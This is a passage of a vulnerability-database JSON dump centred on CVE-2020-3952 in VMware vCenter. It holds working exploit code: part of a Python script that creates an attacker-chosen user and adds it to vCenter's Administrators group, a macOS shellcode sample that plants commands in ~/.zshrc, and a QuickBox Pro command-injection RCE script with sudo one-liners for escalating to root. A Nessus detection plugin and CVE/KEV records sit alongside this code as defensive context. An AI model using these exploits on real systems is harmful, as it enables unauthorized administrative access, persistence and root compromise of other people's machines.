createAttribute(binascii.hexlify(b'givenName'), sUser)\r\n sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local'))\r\n sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser)\r\n sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser)\r\n sAttributes += createObjectClass()\r\n sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass)\r\n ## CN\r\n sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local')\r\n sUserEntry = getLengthPrefix(sCN, b'04') + sCN\r\n \r\n ## Packet Assembly (bottom up)\r\n sPacket = getLengthPrefix(sAttributes, b'30') + 
sAttributes\r\n sPacket = sUserEntry + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n #print(sPacket)\r\n return binascii.unhexlify(sPacket)\r\n\r\ndef buildModifyUserPacket(sUser):\r\n sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode())\r\n sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local')\r\n sMember = binascii.hexlify(b'member')\r\n ## Packet Construction\r\n sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN\r\n sPacket = getLengthPrefix(sPacket, b'31') + sPacket\r\n sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n #print(sPacket)\r\n return binascii.unhexlify(sPacket)\r\n\r\ndef performBind(s):\r\n ## Trying to bind, fails, but necessary (even fails when using correct credentials)\r\n dPacket = buildBindRequestPacket('[email\u00a0protected]','www.IC4.be')\r\n s.send(dPacket)\r\n sResponse = s.recv(1024)\r\n try:\r\n sResponse = sResponse.split(b'\\x04\\x00')[0][-1:]\r\n sCode = binascii.hexlify(sResponse).decode()\r\n if sCode == '31': print('[+] Ok, service reachable, continuing')\r\n else: print('[-] Something went wrong')\r\n except:\r\n pass\r\n return sCode\r\n\r\ndef performUserAdd(s, sUser, sPass):\r\n dPacket = buildUserCreatePacket(sUser,sPass)\r\n s.send(dPacket)\r\n sResponse = s.recv(1024)\r\n try:\r\n sCode = sResponse.split(b'\\x04\\x00')[0][-1:]\r\n sMessage = sResponse.split(b'\\x04\\x00')[1]\r\n if sCode == b'\\x00':\r\n print('[+] Success! 
User ' + sUser + '@vsphere.local added with password ' + sPass)\r\n elif sCode == b'\\x32':\r\n print('[-] Error, this host is not vulnerable (insufficientAccessRights)')\r\n else:\r\n if sMessage[2] == b'81': sMessage = sMessage[3:].decode()\r\n else: sMessage = sMessage[2:].decode()\r\n print('[-] Error, user not added, message received: ' + sMessage)\r\n except:\r\n pass\r\n return sCode\r\n \r\n\r\ndef performUserMod(s, sUser, verbose = True):\r\n dPacket = buildModifyUserPacket(sUser)\r\n s.send(dPacket)\r\n sResponse = s.recv(1024)\r\n try:\r\n sCode = sResponse.split(b'\\x04\\x00')[0][-1:]\r\n sMessage = sResponse.split(b'\\x04\\x00')[1]\r\n if sCode == b'\\x00':\r\n if verbose: print('[+] User modification success (if the above is OK).')\r\n else:\r\n if sMessage[2] == b'81': sMessage = sMessage[3:].decode()\r\n else: sMessage = sMessage[2:].decode()\r\n if verbose: print('[-] Error during modification, message received: ' + sMessage)\r\n except:\r\n pass\r\n return sCode, sMessage\r\n\r\ndef performUnbind(s):\r\n try: s.send(b'\\x30\\x05\\x02\\x01\\x04\\x42\\x00')\r\n except: pass\r\n\r\ndef main():\r\n global _sIP, _iPORT, _iTIMEOUT\r\n _sUSER = 'user_' + randomString(6)\r\n _sPASS = randomString(8) + '_2020'\r\n bAdduser = False\r\n if len(sys.argv) == 1:\r\n print('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]')\r\n print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS)\r\n print(' Leave username & password empty for a vulnerability check')\r\n print(' Watch out for vCenter/LDAP password requirements, leave empty for random password')\r\n print(' But for now, I will ask questions')\r\n sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ')\r\n if not sAnswer == '': _sIP = sAnswer\r\n sAnswer = input('[?] Want to perform a check only? [Y/n]: ')\r\n if sAnswer.lower() == 'n': bAdduser = True\r\n if bAdduser:\r\n sAnswer = input('[?] 
Please enter the new username to add [' + _sUSER + ']: ')\r\n if not sAnswer == '': _sUSER = sAnswer\r\n sAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ')\r\n if not sAnswer == '': _sPASS = sAnswer\r\n else:\r\n _sIP = sys.argv[1]\r\n if len(sys.argv) >= 3:\r\n _sUSER = sys.argv[2]\r\n bAdduser = True\r\n if len(sys.argv) >= 4: _sPASS = sys.argv[3]\r\n\r\n ## MAIN\r\n print('')\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.settimeout(_iTIMEOUT)\r\n try:\r\n s.connect((_sIP,_iPORT))\r\n except:\r\n print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable')\r\n sys.exit(1)\r\n\r\n performBind(s)\r\n\r\n if bAdduser:\r\n sCode = performUserAdd(s, _sUSER, _sPASS)\r\n\r\n if not bAdduser:\r\n print('[!] Checking vulnerability')\r\n sCode, sMessage = performUserMod(s, 'Administrator', False)\r\n if sCode == b'\\x32': print('[-] This host is not vulnerable, message: ' + sMessage)\r\n else: print('[+] This host is vulnerable!')\r\n else:\r\n sCode = performUserMod(s, _sUSER)\r\n \r\n performUnbind(s)\r\n \r\n s.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2020-07-19] #", "sourceHref": "https://0day.today/exploit/34499", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-06-16T15:31:47", "description": "The version of VMware vCenter Server installed on the remote host is 6.7 prior to U3F, and is, therefore, affected by an information disclosure vulnerability caused by insufficient access controls in vmdir. This allows an attacker with network access to an affected vmdir deployment may be able to extract highly sensitive information. This information can be used to compromise the vCenter Server or other services which depends on VMware directory service authentication. 
(CVE-2020-3952) Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-13T00:00:00", "type": "nessus", "title": "VMware vCenter Server 6.7 Sensitive Information Disclosure Vulnerability (VMSA-2020-0006)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2022-01-24T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_VMSA-2020-0006.NASL", "href": "https://www.tenable.com/plugins/nessus/135411", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135411);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/24\");\n\n script_cve_id(\"CVE-2020-3952\");\n script_xref(name:\"VMSA\", value:\"2020-0006\");\n script_xref(name:\"IAVA\", value:\"2020-A-0136-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"VMware vCenter Server 6.7 Sensitive Information Disclosure Vulnerability (VMSA-2020-0006)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization management application installed on the remote host is affected by a\nsensitive information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is 6.7 prior\nto U3F, and is, therefore, affected by an information disclosure vulnerability caused by\ninsufficient access controls in vmdir. This allows an attacker with network access to an \naffected vmdir deployment may be able to extract highly sensitive information. This information\ncan be used to compromise the vCenter Server or other services which depends on VMware directory \nservice authentication. 
(CVE-2020-3952)\n \nNote that Nessus has not tested for these issues but has instead relied only on the application's \nself-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2020-0006.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server 6.7 U3F or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3952\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nport = get_kb_item_or_exit('Host/VMware/vCenter');\nversion = get_kb_item_or_exit('Host/VMware/version');\nrelease = get_kb_item_or_exit('Host/VMware/release');\n\n# Extract and verify the build number\nbuild = ereg_replace(pattern:'^VMware vCenter Server [0-9\\\\.]+ build-([0-9]+)$', string:release, replace:\"\\1\");\nif (build !~ '^[0-9]+$') exit(1, 'Failed to extract the build number from the release string.');\n\nrelease = release - 'VMware vCenter Server ';\nfixversion = NULL;\n\n# Check version and build numbers\n# 6.7 U3 https://docs.vmware.com/en/VMware-vSphere/6.7/rn/vsphere-vcenter-server-67u3f-release-notes.html\nif(version =~ '^VMWare vCenter 6\\\\.7$' && int(build) < 15976714) fixversion = '6.7.0 build-15976714';\nelse audit(AUDIT_LISTEN_NOT_VULN, 'VMware vCenter', port, release);\n\nreport = report_items_str(\n report_items:make_array(\n 'Installed version', release,\n 'Fixed version', fixversion\n ),\n ordered_fields:make_list('Installed version', 'Fixed version')\n);\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "VMware vCenter Server Info Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-3952", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-07-13T16:20:19", "description": "Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-10T14:15:00", "type": "cve", "title": "CVE-2020-3952", "cwe": ["CWE-306"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:vmware:vcenter_server:6.7"], "id": "CVE-2020-3952", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-3952", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*"]}], "0daydb": [{"lastseen": "2020-06-23T13:12:54", "description": "198 bytes small macOS/x64 RickRolling shellcode.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-02T13:54:55", "title": "macOS/x64 zsh RickRolling - Shellcode", "type": "0daydb", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952", "CVE-2020-13693"], "modified": "2020-06-02T13:54:55", "id": "0DAYDB:86305C86483A99E3E27347A2CBC3B02C", "href": 
"https://0daydb.com/macos-x64-zsh-rickrolling-shellcode.html", "sourceData": "/*\n## Shellcode Title: macOS/x64 - zsh RickRolling Shellcode (198 Bytes)\n## Shellcode Author: Bobby Cooke\n## Date: May 31st, 2020\n## Tested on: macOS Catalina v10.15.4\n## Shellcode Description:\n## MacOS Catalina Dynamic, No-Null Shellcode that will Unmute the systems Volume, set the Volume to Maximum, and \"Rick Roll\" the user every time they open a Z-Shell Terminal Window. \n## The shellcode uses the UNIX ExecVE SysCall to spawn a UNIX SH (/bin/sh). The UNIX SH executes an Echo (/bin/echo) command that adds two commands to the users Z-Shell (zsh) Running Config File (~/.zshrc); the ~/.zshrc file will be created if it does not exist. The first command in the ~/.zshrc file leverages the macOS default system binary OSAScript (/usr/bin/osascript) too unmute the macOS system & set the volume too maximum. The second command in the ~/.zshrc file leverages the macOS default system binary Open (/usr/bin/open) to open the 'Rick Astley - Never Gonna Give You Up' video with the macOS systems default browser.\n## C Compile: gcc zsh-rickrolling.c -o zsh-rickrolling\n## Apple clang version 11.0.3 (clang-1103.0.32.62)\n## Compile & Test:\n## root# gcc zsh-rickrolling.c -o zsh-rickrolling\n## root# cat ~/.zshrc\n## cat: /var/root/.zshrc: No such file or directory\n## root# ./zsh-rickrolling\n## Shellcode Length: 198 Bytes\n## root# cat ~/.zshrc\n## osascript -e \"set Volume 9\"\n## open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\"\n## root# zsh\n## [email\u00a0protected] #\n## < Browser Pop & Rick Roll >\n\n---------------------------------------------------------------------\n\n;## ASM Compile: nasm -f macho64 zsh-rickrolling.asm\n;## NASM version 2.14.02 compiled on Sep 28 2019\n;## OBJ Link: ld zsh-rickrolling.o -lSystem -o zsh-rickrolling\n;## BUILD 17:57:49 Apr 24 2020\n;## Get SC: /bin/bash for x in $(objdump -d zsh-rickrolling.o -x86-asm-syntax=intel | grep \"^ \" | cut -f1 | awk -F: 
'{print $2}'); do echo -n \"\\x\"$x; done; echo\nglobal _main\n_main:\n; execve(const char *path, char *const argv[], char *const envp[]);\n; RAX RDI RSI RDX\n; RAX = 0x200003b = Execve System Call Number\n; RDI = &\"/bin/sh\\x00\"\n; RSI = RSP\n; [RSP+10] = argv[0] = &`/bin/sh\\x00`\n; [RSP+8] = argv[1] = &`-c\\x00`\n; [RSP+0] = argv[2] = &`echo \"open 'https...\n; RDX = 0x0\nregclear:\nxor rsi, rsi ; rsi = 0x0\nmul rsi ; rax & rdx = 0x0\nargv0:\nmov rcx, 0x68732f6e69622fff ; \"\\xff/bin/sh\"\nshr rcx, 0x8 ; \"/bin/sh\\x00\"\npush rcx ; rsp = &\"/bin/sh\\x00\"\nmov rdi, rsp ; rdi = *path = &\"/bin/sh\\x00\"\nargv1:\nadd dx, 0x632d ; \"-c\\x00\"\npush rdx ; rsp = &\"-c\\x00\"\nmov rbx, rsp ; rbx = &\"-c\\x00\"\nargv2:\n; \"echo 'osascript -e \\\"set Volume 9\\\"\\r\\nopen \\\"https://www.youtube.com/watch?v=dQw4w9WgXcQ\\\"' >> ~/.zshrc\"\n; String length : 98\nxor rcx, rcx\nadd cx, 0x6372 ; cr\npush rcx\nmov rcx, 0x68737a2e2f7e203e ; hsz./~ >\npush rcx\nmov rcx, 0x3e20272251635867 ; > '\"QcXg\npush rcx\nmov rcx, 0x573977347751643d ; W9w4wQd=\npush rcx\nmov rcx, 0x763f68637461772f ; v?hctaw/\npush rcx\nmov rcx, 0x6d6f632e65627574 ; moc.ebut\npush rcx\nmov rcx, 0x756f792e7777772f ; uoy.www/\npush rcx\nmov rcx, 0x2f3a737074746822 ; /:sptth\"\npush rcx\nmov rcx, 0x206e65706f0A0D22 ; nepo\\n\\r\"\npush rcx\nmov rcx, 0x3920656d756c6f56 ; 9 emuloV\npush rcx\nmov rcx, 0x207465732220652d ; tes\" e-\npush rcx\nmov rcx, 0x2074706972637361 ; tpircsa\npush rcx\nmov rcx, 0x736f27206f686365 ; so' ohce\npush rcx\nmov r9, rsp ; r9 = &`echo \"open 'https...\nloadArgv:\nxor rdx, rdx ; rdx = envp[] = 0x0\npush rdx ; [RSP+18] = 0x0\npush r9 ; [RSP+10] = argv[2] = &Command String\npush rbx ; [RSP+8] = argv[1] = &`-c\\x00`\npush rdi ; [RSP+0] = argv[0] = &`/bin/sh\\x00`\nmov rsi, rsp ; rsi = argv[]\nexecve:\nmov al,2 ; rax = 0x2\nror rax, 0x28 ; rax = 0x2000000\nmov al, 0x3b ; rax = 0x200003b\nsyscall ; execve system 
call\n\n---------------------------------------------------------------------\n\n*/\n\n#include <stdio.h>\n#include <sys/mman.h>\n#include <string.h>\n#include <stdlib.h>\n\nint (*sc)();\n\nchar shellcode[] =\n \"\\x48\\x31\\xf6\\x48\\xf7\\xe6\\x48\\xb9\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\"\n \"\\xc1\\xe9\\x08\\x51\\x48\\x89\\xe7\\x66\\x81\\xc2\\x2d\\x63\\x52\\x48\\x89\\xe3\\x48\"\n \"\\x31\\xc9\\x66\\x81\\xc1\\x72\\x63\\x51\\x48\\xb9\\x3e\\x20\\x7e\\x2f\\x2e\\x7a\\x73\"\n \"\\x68\\x51\\x48\\xb9\\x67\\x58\\x63\\x51\\x22\\x27\\x20\\x3e\\x51\\x48\\xb9\\x3d\\x64\"\n \"\\x51\\x77\\x34\\x77\\x39\\x57\\x51\\x48\\xb9\\x2f\\x77\\x61\\x74\\x63\\x68\\x3f\\x76\"\n \"\\x51\\x48\\xb9\\x74\\x75\\x62\\x65\\x2e\\x63\\x6f\\x6d\\x51\\x48\\xb9\\x2f\\x77\\x77\"\n \"\\x77\\x2e\\x79\\x6f\\x75\\x51\\x48\\xb9\\x22\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x51\"\n \"\\x48\\xb9\\x22\\x0d\\x0a\\x6f\\x70\\x65\\x6e\\x20\\x51\\x48\\xb9\\x56\\x6f\\x6c\\x75\"\n \"\\x6d\\x65\\x20\\x39\\x51\\x48\\xb9\\x2d\\x65\\x20\\x22\\x73\\x65\\x74\\x20\\x51\\x48\"\n \"\\xb9\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x20\\x51\\x48\\xb9\\x65\\x63\\x68\\x6f\\x20\"\n \"\\x27\\x6f\\x73\\x51\\x49\\x89\\xe1\\x48\\x31\\xd2\\x52\\x41\\x51\\x53\\x57\\x48\\x89\"\n \"\\xe6\\xb0\\x02\\x48\\xc1\\xc8\\x28\\xb0\\x3b\\x0f\\x05\";\n\nint main(int argc, char **argv) {\n printf(\"Shellcode Length: %zd Bytes\\n\", strlen(shellcode));\n\n void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);\n\n if (ptr == MAP_FAILED) {\n perror(\"mmap\");\n exit(-1);\n }\n\n memcpy(ptr, shellcode, sizeof(shellcode));\n sc = ptr;\n\n sc();\n\n return 0;\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-23T13:12:55", "description": "CVE-2020-13448 QuickBox Pro versions 2.1.8 and below suffer from an authenticated remote code execution vulnerability.", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-03T15:51:53", "title": "QuickBox Pro 2.1.8 CVE-2020-13448 - Remote Code Execution", "type": "0daydb", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13448", "CVE-2020-12720", "CVE-2020-3952"], "modified": "2020-06-03T15:51:53", "id": "0DAYDB:605E9AABF85A309DCC2B08791CD8A47B", "href": "https://0daydb.com/quickbox-pro-2-1-8-cve-2020-13448-remote-code-execution.html", "sourceData": "# Exploit Title: QuickBox Pro 2.1.8 - Authenticated Remote Code Execution\n# Date: 2020-05-26\n# Exploit Author: s1gh\n# Vendor Homepage: https://quickbox.io/\n# Vulnerability Details: https://s1gh.sh/cve-2020-13448-quickbox-authenticated-rce/\n# Version: <= 2.1.8\n# Description: An authenticated low-privileged user can exploit a command injection vulnerability to get code-execution as www-data and escalate privileges to root due to weak sudo rules.\n# Tested on: Debian 9\n# CVE: CVE-2020-13448\n# References: https://github.com/s1gh/QuickBox-Pro-2.1.8-Authenticated-RCE\n\n'''\nPrivilege escalation: After getting a reverse shell as the www-data user you can escalate to root in one of two ways.\n1. sudo mysql -e '\\! /bin/sh'\n2. 
sudo mount -o bind /bin/sh /bin/mount;sudo mount\n\n'''\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport requests\nimport argparse\nimport sys\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nfrom urllib.parse import quote_plus\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ndef exploit(args):\n s = requests.Session()\n print('[*] Sending our payload...')\n\n s.post('https://' + args.ip + '/inc/process.php', data={'username': args.username, 'password': args.password, 'form_submission': 'login'}, verify=False)\n try:\n s.get('https://' + args.ip + '/index.php?id=88&servicestart=a;' + quote_plus(args.cmd) + ';', verify=False)\n except requests.exceptions.ReadTimeout:\n pass\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Authenticated RCE for QuickBox Pro <= v2.1.8\")\n parser.add_argument('-i',dest='ip',required=True,help=\"Target IP Address\")\n parser.add_argument('-u',dest='username',required=True,help=\"Username\")\n parser.add_argument('-p',dest='password',required=True,help=\"Password\")\n parser.add_argument('-c',dest='cmd', required=True, help=\"Command to execute\")\n args = parser.parse_args()\n\n exploit(args)\n\n\nif __name__ == '__main__':\n main()\n sys.exit(0)", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-23T13:12:54", "description": "CVE-2020-3952 VMware vCenter Server version 6.7 authentication bypass exploit.", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-03T15:50:27", "title": "VMware vCenter Server 6.7 CVE-2020-3952 - 
Authentication Bypass", "type": "0daydb", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13448", "CVE-2020-3592", "CVE-2020-3952"], "modified": "2020-06-03T15:50:27", "id": "0DAYDB:A820E9CE5C7A2E010E37B1EC1DAFD043", "href": "https://0daydb.com/vmware-vcenter-server-6-7-cve-2020-3952-authentication-bypass.html", "sourceData": "# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass\n# Date: 2020-06-01\n# Exploit Author: Photubias\n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html\n# Version: vCenter Server 6.7 before update 3f\n# Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0)\n# CVE: CVE-2020-3952\n\n#!/usr/bin/env python3\n\n'''\n Copyright 2020 Photubias(c) \n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. 
